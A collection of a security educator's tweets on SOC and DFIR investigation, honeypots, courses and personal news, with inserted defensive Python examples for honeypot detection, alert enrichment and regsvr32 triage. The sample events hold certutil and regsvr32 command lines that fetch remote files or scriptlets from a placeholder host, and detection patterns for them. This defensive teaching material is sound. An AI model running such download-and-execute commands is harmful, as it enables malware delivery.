Hi, Y'all!
I tweet about the intersection of cyber security investigation doctrine, cognitive psychology, and education. Also BBQ.
👨🏻🏫 Online Courses I Teach:
📚 Books I've Written:
🌎 Blog & More Links:
Look at this slice of awesome. The new Wireshark version in dev (3.3.0) has a packet diagram view.
A fantastic teaching and learning tool! When released, I'll be making pretty extensive use of this in my classes! Great job @geraldcombs and @WiresharkNews team.
Student: *asks question about thing*
Me: *looks up thing in book I wrote*
Student: "Wait, you have to look up something from your own book?"
Me: "Well yea, why do you think I took the time to write it all down?"
Student: *twitches*
I don't know who needs to hear this today but cyber security work is really hard. Even at the entry level, it's difficult work.
People around you too easily forget that because of the curse of knowledge -- we can't remember what it was like to not know something we know.
I know a lot of teachers right now are getting their classrooms ready for the new year. You're loved and appreciated.
If you've got a classroom wishlist...
Reply to this tweet with your wish list link
AND
Follow me or open your DMs so I can message you
#clearthelist
📚🎁😄
Big news!
After a long wait, I'm excited to publicly release my doctoral dissertation, "The Analyst Mindset: A Cognitive Skills Assessment of Digital Forensic Analysts".
You can download it here: .
I held Ellen's hand as she passed away peacefully last night after an 18 month battle with brain cancer. She was the best person I've ever known and was so incredibly loved.
I got a text message today from someone asking for help increasing their mailbox size.
She owns a small business in Kentucky and got my number from a business card taped to a server I installed FIFTEEN YEARS AGO.
It’s still there, running the entire business.
I’m excited to launch our latest online course, YARA for Security Analysts.
We built this course for people who want to learn to write YARA rules for detection engineering, system triage, incident response, and threat intel research.
#Yara
#DetectionEngineering
#DFIR
#Malware
I've got a few SIGNED copies of my Intrusion Detection Honeypots to give away. 🍯
To enter, retweet this tweet. I'll pick a few folks at random to win on Friday. You must have a US shipping address to win.
Learn about the book here:
I'm excited to share the cover for my next book:
🍯🍯🍯🍯🍯🍯🍯🍯🍯🍯🍯
Intrusion Detection Honeypots: Detection through Deception.
🍯🍯🍯🍯🍯🍯🍯🍯🍯🍯🍯
Available this summer where books are sold.
Investigation Scenario 🔎
HR suspects that a former employee may have taken sensitive data when they quit.
What do you look for to investigate this event?
Assume you have access to any evidence source you want, but no commercial DLP tools.
#InvestigationPath
#DFIR
#SOCAnalyst
One of the more helpful things new analysts can do is to read about different sorts of attacks and understand the timeline of events that occurred in them. This enables something called forecasting, which is an essential skill. Let's talk about that. 1/
Today I’m releasing the first in a series of blog posts dedicated to analysis techniques you can use to deal with large overwhelming PCAP files.
First up I’m colorizing packets by conversation in Wireshark.
I'm beyond excited to announce the newest @NetworkDefense online course: CyberChef for Security Analysts. 👨‍🍳👩‍🍳
You can learn more and sign up for it here: .
Today is my official graduation day. I needed to be elsewhere so I couldn’t attend as planned, but I did manage to take a picture in my doctoral regalia a couple of days ago for posterity.
I don't know who needs to hear this, but if you traveled regularly for work and haven't in a while because of the pandemic, go check your travel bag and make sure you didn't leave any snacks in there...
...
A lot of SOC jobs are seen as temporary stepping stones and places where burnout is a certainty. I think that's less about the job and more about many environments failing to adequately support the job.
Let’s play a game. Assume you’ve been hired as the CISO of a 1000 employee org that has literally no security infrastructure.
What types of product-based security solutions are REQUIRED purchases to build an effective sec program within 3 years?
When an attacker gains initial access to a system on a network, common actions are:
1. Scanning the network for pivot targets
2. Pillaging the system for valuable files
3. Stealing credentials from the system
Each provides an opportunity for honeypot-based detection 🧵
1/
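As an added example (not part of the original thread, and not code from the author or his book), here is what detection for each of those three actions can look like once decoys are planted: a honey account that is never legitimately used, a canary document on a share, and a fake host with a few listeners. The account name, share path, host, the authorized-scanner address and the event shapes are all constructed for this illustration.

```python
from collections import defaultdict

# Decoys planted in the environment. All names, hosts and log shapes here are
# constructed for this example; nothing legitimate should ever authenticate
# as, open, or connect to any of them.
HONEY_USERS = {"svc_backup_legacy"}                   # account exists, is never used
HONEY_FILES = {r"\\fs01\finance\2019_payroll.xlsx"}   # canary document on a share
HONEY_HOST = "10.0.5.250"                             # fake host with listeners
SCAN_THRESHOLD = 3                  # distinct honey ports from one source => scanning
AUTHORIZED_SCANNERS = {"10.0.0.9"}  # environmental context: the real vuln scanner


def detect(events):
    """Return (rule, source_ip, detail) findings from a list of event dicts.

    Event shapes (constructed for this example):
      {"type": "auth", "src", "user", "dst", "result"}
      {"type": "file", "src", "user", "path"}
      {"type": "conn", "src", "dst", "dport"}
    """
    findings = []
    honey_ports_by_src = defaultdict(set)
    honey_files = {p.lower() for p in HONEY_FILES}

    for e in events:
        if e["type"] == "auth" and e["user"].lower() in HONEY_USERS:
            # The honey credential only exists in one place (e.g. a saved
            # RDP profile on a decoy host); any use, failed or not, means it
            # was harvested from there.
            findings.append(("honey_credential_use", e["src"],
                             f"user={e['user']} dst={e['dst']} result={e['result']}"))
        elif e["type"] == "file" and e["path"].lower() in honey_files:
            findings.append(("honey_file_access", e["src"],
                             f"user={e['user']} path={e['path']}"))
        elif e["type"] == "conn" and e["dst"] == HONEY_HOST:
            if e["src"] in AUTHORIZED_SCANNERS:
                continue  # known scanner; suppress rather than page on it
            honey_ports_by_src[e["src"]].add(e["dport"])

    # Report listener touches once per source; several ports from one
    # source looks like a sweep rather than a stray connection.
    for src, ports in honey_ports_by_src.items():
        rule = "honey_host_scan" if len(ports) >= SCAN_THRESHOLD else "honey_host_touch"
        findings.append((rule, src, "ports=" + ",".join(str(p) for p in sorted(ports))))
    return findings


# Constructed sample telemetry: the scanner sweeps the decoy, then a real
# workstation sweeps it, opens the canary file, and tries the honey account.
SAMPLE_EVENTS = [
    {"type": "conn", "src": "10.0.0.9",  "dst": HONEY_HOST, "dport": 22},
    {"type": "conn", "src": "10.0.0.9",  "dst": HONEY_HOST, "dport": 445},
    {"type": "conn", "src": "10.0.0.9",  "dst": HONEY_HOST, "dport": 3389},
    {"type": "conn", "src": "10.0.4.31", "dst": HONEY_HOST, "dport": 22},
    {"type": "conn", "src": "10.0.4.31", "dst": HONEY_HOST, "dport": 445},
    {"type": "conn", "src": "10.0.4.31", "dst": HONEY_HOST, "dport": 3389},
    {"type": "file", "src": "10.0.4.31", "user": "jdoe",
     "path": r"\\fs01\finance\2019_Payroll.xlsx"},
    {"type": "auth", "src": "10.0.4.31", "user": "SVC_BACKUP_LEGACY",
     "dst": "dc01", "result": "failure"},
    {"type": "auth", "src": "10.0.4.31", "user": "jdoe", "dst": "dc01", "result": "success"},
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, src, detail in run_sample():
        print(f"{rule:22} src={src:11} {detail}")
```

The point of the suppression list is that the decoy host will be hit by your own vulnerability scanner; that is the one source you expect, and everything else touching it is a finding regardless of how many ports it tried.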
A lot of teachers are starting back to school today or around now. We love you and we're thinking about you.
PS - If you're seeing this and you're one of those teachers, DM me your classroom Amazon wishlist if you have one 😉
We had the funeral service for Ellen this past weekend. It was a beautiful celebration of her life with hundreds of people who loved her in attendance. I'm trying to figure out what life looks like now, and honestly, I'm struggling, but I've got help and I'll be okay eventually.
The most common action an analyst will take is performing a search. Usually in a tool like Security Onion, Splunk, Kibana, and so on. The second most common action an analyst will take is pivoting. That term gets used a lot, but what exactly does it mean? 1/
Intrusion Detection Honeypots are the most valuable, yet underutilized detection technologies available, and these techniques often scale down as well as they scale up. 🍯
For threat hunting, a non-trivial amount of the work is referencing, creating, and updating system and network inventory. This doesn't get talked about enough as a skill set that someone develops. 1/
I've been getting a lot of new RTF gear lately. It's good timing because I'm down 60 pounds now and all my old stuff is too big. A good problem to have! It's been a long road but I'm feeling the best I have physically since college.
Here's the deal. Today's my birthday and all I want from you is the same thing I ask for every year -- reply to this tweet and share with me some *unconventional* wisdom you've learned over the course of your life. It can be about anything.
Hi New Followers!
I tweet about infosec, psychology, packets, education, and investigations.
Favorite blog posts:
Free Cuckoo’s Egg training:
Online training courses:
I’ve been working with @da_667 to turn his Building Virtual Labs book into a “Choose Your Own Adventure” online course for @NetworkDefense. I think it turned out really well, and it’ll be open on Thursday.
You can read about it here:
Investigation Scenario 🔎
A user workstation made a DNS query for a domain that was reported to be associated with malvertising activity.
What do you look for to start investigating this event?
Assume you have access to any evidence source you want.
One of the bigger initial barriers for newer analysts to break through is understanding exactly where investigative work happens. Much of it happens in the web browser and search engine rather than the SIEM or command line. 1/
We put together a @sigma_hq cheat sheet while building our Detection Engineering with Sigma online course.
Even if you don't take the course, you can grab the cheat sheet for free here:
Course Details:
Shout out to all the SOC analysts on shift or IR folks working cases today, and their families. We appreciate ya.
If you're able, drop by and bring them something tasty or give 'em a shout to let them know you're thinking about them.
By the way, when I say great tools don't just help people do a job, they teach them how to do it...this is an example.
Sometimes it's nudging people toward decisions. Here, it's simplifying complexity using visual reference models.
I’m excited to launch our latest course, Splunk for Security Analysts. ⛏️
You can read more about the online, on-demand Splunk for Security Analysts course and register now at .
I'm really excited to share that our newest online class, Detection Engineering with Sigma, is open this morning. You can learn more and register at .
The course is discounted for launch until next Friday.
Investigation Scenario 🔎
While hunting through O365 logs, you discovered the depicted entry related to one of your user’s mailboxes.
The user is on vacation for a week and unreachable. What do you look for to investigate whether an incident occurred?
#InvestigationPath
#DFIR
Well folks, we raised $11,000 for the @RuralTechFund at @DerbyCon. That’ll change a lot of lives.
Thank you to everyone who came by and bought a shirt or raffle ticket.
For you IR folks or many-hat-wearing IT folks who got a lot busier this week... make sure you're taking breaks, eating all your meals, and getting enough sleep. Your brain (and the rest of your body) will work a lot better.
Shout out to @CISAKrebs and others like him in government service who lose their jobs doing what’s right. I’ve been there too. You’re on the right side of history and we see you.
When I retire, I think I'm just gonna hook the smoker up to the truck and drive around to all my favorite SOCs and cook BBQ for everybody. Traveling infosec tailgate.
I just published the third article in my series dedicated to analyzing large PCAPs.
This one focuses on distilling PCAPs down to key events with Suricata, Bro, PRADS, and more.
I also mention the @securityonion so-import-pcap script.
Investigation Scenario 🔎
A JR analyst is concerned that Cobalt Strike is running on a Windows host. They proposed steps to investigate the event.
What feedback would you give them on their proposed investigation path? What would you prioritize, deprioritize, add, or change?
It's been a while since I've updated on Ellen's condition. Unfortunately, her cancer has progressed significantly in the past couple of months. We recently decided to forgo further treatment and pursue hospice care as she enters her final weeks.
A year ago today, my wife Ellen had a seizure. In March, I shared that she eventually received a diagnosis of Glioblastoma, a rare form of incurable brain cancer. She's been doing well, considering what she's dealing with. Here's an update...
“The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage” by Clifford Stoll is a nonfiction masterpiece. The story is a first-person account of searching for a hacker while Stoll was working at the Lawrence Berkeley National Laboratory. After noticing a 75-cent 1/
Host OS logs are forensically valuable and you should take time to learn and experiment with common sequences. Here’s a few steps to help you…
FIRST, setup a Windows system using these logging recs:
And this sysmon config: . 1/
From recent research...
Upon notification of potential malware infection, SOC analysts tend to spend more time trying to confirm the malware infection, whereas IR/DF analysts tend to assume infection and move toward understanding impact.
Investigation Scenario 🔎
TeamViewer_Desktop.exe executed on a system in your network.
What do you look for to start investigating this event?
Assume you have access to any evidence source you want.
One of the more unfortunate artifacts from how defensive security evolved is how fractured the SOC, IR, and DF communities are. They all rely on the same cognitive toolset, but often operate as separate professional communities much of the time. 1/
Investigation Scenario 🔎
A system mounted a file named TXRTN_8291834.iso.
What do you look for to determine if this system is infected and identify the potential malware?
The file is no longer available but you can use any other evidence source you like.
#InvestigationPath
We're celebrating good news today, as Ellen finished her six weeks of radiation and chemo every day. She got through with only very minimal side effects and feels pretty good!
In the 1980s the CIA caught a contractor stealing information because a secretary noticed the last login time for her terminal was not what it should be.
Last Login Time may be one of the best bang for your buck security controls you can implement, but so few people do.
All the things we say about people at funerals should be said at birthdays and anniversaries and brunches and Tuesdays and so many other times as well.
Very excited to share that we raised over $8000 for @RuralTechFund at @Derbycon. This shatters last year's total. 100% of that will go to classrooms in rural areas, helping us introduce thousands of students to technical education. I’m grateful for everyone who contributed!
I'm pretty impressed with Brim. It's a really quick way to break down a PCAP into Zeek logs, do some quick analysis, and even pivot back into smaller PCAPs.
#SOC
Repo:
Download:
Demo:
Most analysts deal with decision fatigue -- a phenomenon that causes their decision making to get worse as they make a greater number of decisions. I bet you've experienced this too...🧵 1/
I spent a good chunk of the past week talking with teachers and helping them stock their classrooms for the upcoming school year. I want to talk a bit about some issues teachers are facing right now. 1/ 🧵
I'm really honored to have won the SANS Difference Makers Award for my work with the RTF.
This was quite a shock, and I appreciate SANS recognizing the cause of helping expose more rural kids to technology education.
Congratulations to the winners of the 2018 Difference Makers Award! The Difference Makers Awards were created to honor the unsung heroes in #cybersecurity whose innovation, skill, and hard work have resulted in real successes in information security.
An Investigation Theory student asked me a good question last week -- Do you need to understand how a specific malware strain works to investigate a system where you suspect it might be present? Let's talk about it. 1/
Investigation Scenario 🔎
A user reported their mouse moving around on the screen by itself for a few minutes. The cursor appeared to open and close a few documents on the desktop.
What do you look for to investigate whether an incident has occurred?
#InvestigationPath
#DFIR
Let's talk about the differences between novices and experts. But, instead of cyber security, we'll use airport baggage screeners as an example. These are the folks who use the scanner screens to find forbidden items in luggage 1/
Some of the work I'm most proud of from my time at Mandiant was pioneering the building of investigative actions *into detection signatures* as they were written. This had profound impact across the detection and product teams, and made the tool so much more accessible.
A good alert includes:
- Detection context
- Investigation/response context
- Orchestration actions
- Prevalence info
- Environmental context (e.g., src IP is a scanner)
- Pivots/visual to understand what else happened
- Able to answer, "Is host already under investigation?"
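As an added example (not the author's code, and not from any product mentioned on this page), here is the shape of that enrichment in practice: a bare detection, with its investigation steps carried inside the rule as the Mandiant tweet above describes, gets prevalence, environmental context, open-case state, pivots and suggested orchestration attached before an analyst sees it. The inventory, case list, execution telemetry and the alert itself are constructed; the rarity threshold and the action names are assumptions.

```python
# Constructed reference data for a hypothetical environment.
ASSET_INVENTORY = {
    "ws-0412": {"owner": "jdoe",   "role": "workstation",  "tags": []},
    "scan01":  {"owner": "it-ops", "role": "vuln_scanner", "tags": ["authorized_scanner"]},
}
OPEN_CASES = {"IR-2231": {"hosts": {"ws-0412"}, "status": "open"}}
# Process executions seen in the last 30 days as (host, image); constructed.
RECENT_EXECUTIONS = [
    ("ws-0412", "certutil.exe"), ("ws-0412", "chrome.exe"), ("ws-0098", "chrome.exe"),
    ("ws-0231", "chrome.exe"), ("ws-0555", "chrome.exe"), ("scan01", "nmap.exe"),
]
RARE_FRACTION = 0.25  # image seen on fewer than 25% of hosts counts as rare


def enrich(alert, inventory=ASSET_INVENTORY, cases=OPEN_CASES, executions=RECENT_EXECUTIONS):
    """Attach prevalence, environment, case state, pivots and suggested
    orchestration to a bare detection so the analyst starts with context."""
    host, image = alert["host"], alert["image"].lower()
    all_hosts = {h for h, _ in executions}
    hosts_with_image = {h for h, img in executions if img.lower() == image}
    rare = len(hosts_with_image) / max(len(all_hosts), 1) < RARE_FRACTION

    asset = inventory.get(host, {"owner": "unknown", "role": "unknown", "tags": []})
    is_scanner = "authorized_scanner" in asset["tags"]
    case_id = next((cid for cid, c in cases.items()
                    if c["status"] == "open" and host in c["hosts"]), None)

    # Orchestration is suggested, not executed: isolation needs a human
    # approval, and never for the authorized scanner.
    actions = ["collect_triage_package"]
    if rare and not is_scanner:
        actions.append("queue_host_isolation_for_approval")

    return {
        **alert,
        "prevalence": {"hosts_with_image": len(hosts_with_image),
                       "hosts_observed": len(all_hosts), "rare": rare},
        "environment": {"owner": asset["owner"], "role": asset["role"],
                        "authorized_scanner": is_scanner},
        "under_investigation": case_id,
        "pivots": [
            {"name": "same host, +/-5 minutes", "filter": {"host": host, "window_minutes": 5}},
            {"name": "same image elsewhere", "filter": {"image": alert["image"], "not_host": host}},
            {"name": "user logons", "filter": {"user": alert["user"], "event": "logon"}},
        ],
        "orchestration": actions,
    }


# Constructed alert. The investigation steps travel with the rule, which is
# the point of writing them into the signature rather than a separate wiki.
SAMPLE_ALERT = {
    "rule": "certutil used to fetch a remote file",
    "investigate": [
        "Extract the URL from the command line and check its reputation",
        "Identify the parent process and the interactive user",
        "Find the file written by certutil and anything that executed it",
    ],
    "ts": "2023-05-02T14:03:11Z", "host": "ws-0412", "user": "jdoe",
    "image": "certutil.exe",
    "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt",
}


if __name__ == "__main__":
    import json
    print(json.dumps(enrich(SAMPLE_ALERT), indent=2))
```

Two things to notice: the same rule firing on the scanner host yields only a triage collection, because the inventory says that host is supposed to behave strangely, and the open-case lookup is what stops a second analyst from starting a parallel investigation of a host someone already owns.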
Since I spend so much time talking to and researching SOCs and SOC analysts, I often get asked, "What's the biggest difference between high- and low-growth SOCs?"
The answer? Expectations.
1/
I'm doing research for my next book and I'd love to talk to you if:
- You've used honeypots/tokens to successfully catch bad guys
- You've been caught by honeypots/tokens as a pen tester
- You've used a non-typical type of deception tech to do cool things
RTs appreciated
Shout out to all the SOC analysts just trying to get through their alert queues this month while being bombarded with questions about CVEs, breaches, and the constant distractions that come with it all.
I'm keynoting the SANS Threat Intel Summit two weeks from today.
This'll be my first public, in-person talk since 2020 and I'll be discussing my research on how analysts think and work through investigations.
You can attend in person or virtually:
Getting people interested in infosec isn’t hard. Keeping them is. How we lose people (unordered):
1) Reliance on tacit knowledge
2) A knowledge-based social economy
3) Exclusivity
4) Unclear traditional academic paths to success
5) Lack of leadership accountability
One of the most common questions analysts ask me -- what do I do when I get stuck in an investigation? This happens to everyone, especially when you're inexperienced. Let's talk about that... 1/
There's often interesting public discussion about vendor detection tools and what they detect vs expectations. There's some interesting decision making that happens behind the scenes at these vendors when it comes to how they manage detection signatures. A thread... 1/
Investigation Scenario 🔎
You’ve discovered regsvr32.exe running from the C:\Users\Username\Appdata\Roaming directory on a Windows system.
What do you look for to investigate whether an incident occurred?
#InvestigationPath
#DFIR
#SOC
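As an added example (not part of the original tweet, and not an answer from the author), here is how the first pass of that investigation can be written down as triage logic over process-creation telemetry: is the binary the real one in System32, what is it loading and from where, and who spawned it. Field names follow Sysmon's process-creation event; the events themselves, the host names, users and paths are constructed, and the list of suspicious parents and user-writable locations is an assumption you would tune to your own environment.

```python
import re
from pathlib import PureWindowsPath

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
# Locations a non-admin user can write to; a DLL or scriptlet loaded from
# here, or a copy of regsvr32.exe living here, is worth a look.
USER_WRITABLE = re.compile(
    r"^c:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|programdata|windows\\temp)\\",
    re.I)
OFFICE_AND_SCRIPT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                             "mshta.exe", "wscript.exe", "cscript.exe"}


def _in_dirs(path, prefixes):
    p = path.lower()
    return any(p.startswith(pre + "\\") for pre in prefixes)


def triage_regsvr32(events):
    """Return one finding per Sysmon-style process-creation event (EventID 1)
    where regsvr32.exe looks out of place, with the reasons and the fields
    an analyst pivots on next. Event field names follow Sysmon's; the events
    themselves are constructed."""
    findings = []
    for e in events:
        if e["EventID"] != 1:
            continue
        image = PureWindowsPath(e["Image"])
        if image.name.lower() != "regsvr32.exe":
            continue

        reasons = []
        if not _in_dirs(str(image), SYSTEM_DIRS):
            reasons.append("image outside System32/SysWOW64 (copied or masquerading binary)")
        parent_name = PureWindowsPath(e["ParentImage"]).name
        if parent_name.lower() in OFFICE_AND_SCRIPT_PARENTS:
            reasons.append(f"spawned by {parent_name}")

        # Walk the arguments: the DLL or scriptlet being registered is what
        # matters, whether quoted, bare, or a /i:URL handed to scrobj.dll.
        for quoted, bare in re.findall(r'"([^"]+)"|(\S+)', e["CommandLine"]):
            arg = quoted or bare
            if USER_WRITABLE.match(arg):
                reasons.append(f"loads {arg} from a user-writable path")
            elif re.match(r"^[/-]i:https?://", arg, re.I) or arg.lower().endswith("scrobj.dll"):
                reasons.append(f"scriptlet/remote argument {arg}")

        if reasons:
            findings.append({
                "time": e["UtcTime"], "host": e["Computer"], "user": e["User"],
                "parent": e["ParentImage"], "cmdline": e["CommandLine"], "reasons": reasons,
            })
    return findings


# Constructed events: a normal installer registration, the scenario from the
# tweet (regsvr32 copied into Roaming, loading a DLL from there), and a
# regsvr32 scriptlet fetch spawned by Word.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2023-05-02 13:58:02", "Computer": "ws-0412",
     "User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"EventID": 1, "UtcTime": "2023-05-02 14:03:11", "Computer": "ws-0412",
     "User": r"CORP\jdoe", "Image": r"C:\Users\jdoe\AppData\Roaming\regsvr32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\jdoe\AppData\Roaming\update.dll"},
    {"EventID": 1, "UtcTime": "2023-05-02 14:07:40", "Computer": "ws-0098",
     "User": r"CORP\asmith", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"},
]


if __name__ == "__main__":
    for f in triage_regsvr32(SAMPLE_EVENTS):
        print(f["time"], f["host"], f["user"], f["parent"])
        for r in f["reasons"]:
            print("   -", r)
```

The reasons list is deliberately the investigation path: an image outside the system directories sends you to hash and file-creation history for that binary, a DLL in Roaming sends you to what dropped it, and an Office parent sends you to the document the user opened a minute earlier.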